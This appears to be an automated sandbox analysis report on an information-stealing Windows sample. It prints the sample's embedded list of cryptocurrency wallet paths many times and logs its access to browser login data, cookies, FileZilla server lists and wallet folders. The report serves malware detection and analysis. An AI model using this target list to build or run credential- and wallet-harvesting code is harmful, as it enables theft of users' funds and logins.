Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 81.77rs\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*n8
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
